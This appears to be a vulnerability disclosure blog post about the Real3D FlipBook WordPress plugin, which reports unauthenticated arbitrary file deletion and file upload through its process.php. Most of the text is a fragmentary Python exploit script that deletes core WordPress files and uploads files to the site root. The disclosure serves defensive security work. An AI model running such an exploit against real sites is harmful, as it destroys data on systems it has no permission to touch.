

We can upload PDF files or JPEG images and it will automatically make an interactive flipbook for WordPress posts and pages. At the time of writing this post, the plugin costs $32, with $9.60 for extended 12 months support. You can find further details on the official CodeCanyon page. The company I work for bought this plugin a few days ago and decided to use it on our WordPress blog for the company's featured magazine. We don't install plugins directly on our WordPress instance. We usually audit the code and add some tweaks first.

While auditing this plugin, I found some critical vulnerabilities which can be exploited by an unauthenticated user to do some real damage to our WordPress installation.

Delete any file or directory from the server (Unauthenticated)
Upload images in Root directory (Unauthenticated)

Let's take a look at these vulnerabilities individually.

Delete Files or Directories (Unauthenticated)

This vulnerability exists in the file wp-content/plugins/real3d-flipbook/includes/process.php.

    print(' Deleting Files from wp-includes/ & wp-admin/')
    r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
    encodedImage = base64.b64encode(r.content)
    print(' Files have been deleted successfully')
    print(' Uploading image file in target root directory')
    r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
    print(' Image has been uploaded here ' + self.url + '/' + self.payload2 + '.jpg')
    r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
    print(' ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3 + '&bookId=' + self.payload3)
    os.system('cls' if os.name == 'nt' else 'clear')
    print(tabs + '* CodeCanyon Real3D FlipBook WordPress Plugin *')
    print(tabs + '* Multiple Vulnerabilities Found by: *')

